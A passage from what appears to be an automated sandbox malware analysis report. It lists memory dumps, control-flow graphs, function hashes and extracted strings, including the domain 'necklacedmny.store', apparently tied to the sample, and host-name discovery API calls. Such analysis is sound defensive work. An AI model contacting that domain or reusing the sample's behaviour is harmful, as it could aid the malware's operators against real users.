                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Bg$Ehrd$Rg$bg$i[k]$necklacedmny.store$n|of$txLL$g
                                                                                    • API String ID: 0-3642652765
                                                                                    • Opcode ID: a6fe816f3869aaaf746da1d3503dda1c25a4f47309d381d14af218173b17e4d8
                                                                                    • Instruction ID: 43f0d07354aeaa63b5b9f0073ddb8216c204e898004b5cf6be504e942accb545
                                                                                    • Opcode Fuzzy Hash: a6fe816f3869aaaf746da1d3503dda1c25a4f47309d381d14af218173b17e4d8
                                                                                    • Instruction Fuzzy Hash: 300239B59083408FD304DF24EC9236BBBF3EB85304F149A6CE5859B362E7368949CB52
                                                                                    Function 00680460 Relevance: 11.7, Strings: 9, Instructions: 454COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 357 680460-6806bb 358 6806c0-6806f4 357->358 358->358 359 6806f6-68070e 358->359 361 68071c-680736 359->361 362 680715-680717 359->362 364 680740-68076e 361->364 363 680b71-680b7b 362->363 364->364 365 680770-680790 364->365 367 680b49 365->367 368 680a8b-680aad 365->368 369 680b0c-680b15 365->369 370 6808ae-6808bc 365->370 371 680acf 365->371 372 680ac2 365->372 373 6808c3-6808d8 365->373 374 680906-680973 365->374 375 680b67-680b6e 365->375 376 680b1c-680b2e 365->376 377 680b3e-680b40 365->377 378 6808df-6808ff 365->378 379 680af0-680aff 365->379 380 680ad5-680aeb 365->380 381 680b35 365->381 382 680797-6807c1 365->382 387 680b53 367->387 390 680ab4-680abb 368->390 369->367 369->375 369->376 369->377 369->381 384 680b5a-680b61 369->384 385 680b7c 369->385 386 680b83 369->386 369->387 370->367 370->368 370->369 370->371 370->372 370->373 370->374 370->375 370->376 370->377 370->378 370->379 370->380 370->381 370->384 370->385 370->386 370->387 372->371 373->367 373->368 373->369 373->371 373->372 373->374 373->375 373->376 373->377 373->378 373->379 373->380 373->381 373->384 373->385 373->386 373->387 388 680980-6809a5 374->388 375->363 376->367 376->375 376->377 376->381 376->384 376->385 376->386 376->387 377->367 378->367 378->368 378->369 378->371 378->372 378->374 378->375 378->376 378->377 378->379 378->380 378->381 378->384 378->385 378->386 378->387 393 680b06 379->393 380->379 381->377 383 6807d0-6807f8 382->383 383->383 392 6807fa-680826 383->392 384->375 385->386 398 680b8a 386->398 387->384 388->388 396 6809a7-6809af 388->396 390->367 390->369 390->371 390->372 390->375 390->376 390->377 390->379 390->380 390->381 390->384 390->385 390->386 390->387 399 680830-68087a 392->399 393->369 400 6809d1-6809e0 396->400 401 6809b1-6809b9 396->401 398->398 399->399 405 68087c-680892 399->405 403 6809e2-6809e4 400->403 404 680a05-680a25 400->404 402 6809c0-6809cf 401->402 402->400 402->402 406 6809f0-680a01 403->406 407 680a30-680a6d 404->407 410 680897-6808a7 405->410 406->406 408 680a03 406->408 407->407 409 680a6f-680a84 407->409 408->404 409->368 410->367 410->368 410->369 410->370 410->371 410->372 410->373 410->374 410->375 410->376 410->377 410->378 410->379 410->380 410->381 410->384 410->385 410->386 410->387
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !m%k$#i4g$+e(c$@-+$g!~_$necklacedmny.store$v%r#$y)v'$yw
                                                                                    • API String ID: 0-3070082895
                                                                                    • Opcode ID: ad281f772c8bb81da21fa026337a9a1ca412d099b02a8d25e12ae95b128a04ac
                                                                                    • Instruction ID: fa2d0e30eca375bd933722afd783e6bbc77263d860b656b35ee3e80953ec7a36
                                                                                    • Opcode Fuzzy Hash: ad281f772c8bb81da21fa026337a9a1ca412d099b02a8d25e12ae95b128a04ac
                                                                                    • Instruction Fuzzy Hash: 8FF199B110C3819FE3249F24DC947ABBBF5EB85300F109E2CE6D99B261D7758845CB92
                                                                                    Function 0069F9D0 Relevance: 10.1, APIs: 3, Strings: 2, Instructions: 1324COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0069F9FB
                                                                                    • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0069FABA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: \X"Q$a|cI
                                                                                    • API String ID: 3545744682-3233608862
                                                                                    • Opcode ID: dd731ff8037427d67ea7b9f7a647f5b4f0b5b59aac117f67fb2bd10b22923363
                                                                                    • Instruction ID: 699825bbcff270bdd35cfa6574d3333486b92cd154dcb211403e57ff81a0c511
                                                                                    • Opcode Fuzzy Hash: dd731ff8037427d67ea7b9f7a647f5b4f0b5b59aac117f67fb2bd10b22923363
                                                                                    • Instruction Fuzzy Hash: 309204716047818FE7298F39C490762BBE2AF96314F29C6ADC4D68B792D739D806CB50
                                                                                    Function 006979B0 Relevance: 8.0, Strings: 6, Instructions: 507COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 657 6979b0-697a11 658 697a20-697aa9 657->658 658->658 659 697aaf-697af6 658->659 661 697af8-697afd 659->661 662 697aff 659->662 663 697b02-697b2e call 67c880 661->663 662->663 667 697b30-697b32 663->667 668 697b34-697b6b call 67c880 663->668 667->668 671 697b70-697bc2 668->671 671->671 672 697bc4-697bcf 671->672 673 697bf1-697bfe 672->673 674 697bd1-697bd6 672->674 676 697c21-697c2c call 6b46d0 673->676 677 697c00-697c04 673->677 675 697be0-697bef 674->675 675->673 675->675 680 697c31-697c39 676->680 679 697c10-697c1f 677->679 679->676 679->679 681 697de8 680->681 682 697dfd-697eba 680->682 683 697efd-697f1f 680->683 684 697dee-697df4 call 67c890 680->684 685 697c50-697c61 680->685 686 697c40-697c47 680->686 687 697dd0 680->687 688 697dd6-697de0 680->688 693 697ec0-697edb 682->693 689 697f20-697f34 683->689 684->682 690 697c6a 685->690 691 697c63-697c68 685->691 686->685 688->681 689->689 695 697f36-697fc9 689->695 696 697c6c-697d1b call 67c880 690->696 691->696 693->693 694 697edd-697ef5 call 695540 693->694 694->683 699 697fd0-698018 695->699 705 697d20-697d4c 696->705 699->699 702 69801a-69803d call 695390 699->702 710 698045 702->710 705->705 707 697d4e-697d56 705->707 708 697d58-697d5f 707->708 709 697d71-697d7e 707->709 711 697d60-697d6f 708->711 712 697da1-697dc1 call 6b46d0 709->712 713 697d80-697d84 709->713 716 69804b-698054 call 67c890 710->716 711->709 711->711 712->681 712->683 712->684 712->687 712->688 712->710 712->716 721 698060 712->721 722 69806c-698074 call 67c890 712->722 723 698077-698083 712->723 724 698066 712->724 714 697d90-697d9f 713->714 714->712 714->714 716->721 721->724 722->723 724->722
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DG$Dw$Mx$n~$wE$qVw
                                                                                    • API String ID: 0-1111290910
                                                                                    • Opcode ID: 191908dc93c986b0ddc5765369a2357be098e3f60004fa847cc1e70b5533a3d6
                                                                                    • Instruction ID: 18e9e7bc8a3e4d11861623f3b397673e923f86eff50edde21cd25f6e13f0bb28
                                                                                    • Opcode Fuzzy Hash: 191908dc93c986b0ddc5765369a2357be098e3f60004fa847cc1e70b5533a3d6
                                                                                    • Instruction Fuzzy Hash: 1AF1DCB16183408FD304DF24D8916ABBBF6EF95314F048A2CF4958B391E7B88946CB97
                                                                                    Function 0067F755 Relevance: 8.0, Strings: 6, Instructions: 466COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 727 67f755-67f75a 728 67f826-67f837 727->728 729 67f8e5 727->729 730 67f761-67f765 727->730 731 67f7a0-67f7fa 727->731 732 67f960-67f96d 727->732 733 67fa20-67fa29 727->733 734 67fa2f 727->734 735 67f8ed-67f8f9 727->735 736 67f92c-67f93e 727->736 737 67f9ec-67f9f1 727->737 738 67f76a-67f785 727->738 739 67f9a8-67f9bf 727->739 740 67f973-67f985 727->740 741 67f9fe-67fa0b 727->741 742 67f9f8 727->742 743 67f945 727->743 744 67f9c2-67f9e5 727->744 745 67f801-67f805 727->745 746 67f900-67f913 727->746 747 67f9c0 727->747 748 67f94d-67f956 727->748 749 67f98c-67f9a1 call 6b0e00 727->749 750 67f80a-67f816 727->750 751 67fa16-67fa1f 727->751 752 67f790-67f79c call 67c7e0 727->752 753 67fa10 727->753 754 67fa50-67fa52 727->754 755 67f81d-67f824 727->755 756 67fa5a-67fa66 727->756 757 67f919-67f925 727->757 761 67f840-67f86b 728->761 729->735 765 67fa41-67fa47 730->765 731->728 731->729 731->732 731->733 731->734 731->735 731->736 731->737 731->739 731->740 731->741 731->742 731->743 731->744 731->745 731->746 731->747 731->748 731->749 731->750 731->751 731->753 731->754 731->755 731->756 731->757 732->740 733->734 759 67fa38 734->759 735->746 736->732 736->733 736->734 736->737 736->739 736->740 736->741 736->742 736->743 736->744 736->747 736->748 736->749 736->751 736->753 736->754 736->756 762 67fa92-67fc72 736->762 763 67fcb0-67feb8 736->763 737->733 737->734 737->742 737->751 737->753 737->754 737->756 737->762 737->763 738->752 739->747 740->733 740->734 740->737 740->739 740->742 740->744 740->747 740->749 740->751 740->753 740->754 740->756 740->762 740->763 741->732 743->748 744->733 744->734 744->737 744->742 744->751 744->753 744->754 744->756 744->762 744->763 745->759 746->757 747->744 748->732 749->733 749->734 749->737 749->739 749->742 749->744 749->747 749->751 749->753 749->754 749->756 749->762 749->763 750->728 750->729 750->732 750->733 750->734 750->735 750->736 750->737 750->739 750->740 750->741 750->742 750->743 750->744 750->746 750->747 750->748 750->749 750->751 750->753 750->754 750->755 750->756 750->757 751->733 752->731 754->756 760 67f873-67f89f 755->760 757->732 757->733 757->734 757->736 757->737 757->739 757->740 757->741 757->742 757->743 757->744 757->747 757->748 757->749 757->751 757->753 757->754 757->756 757->762 757->763 759->765 773 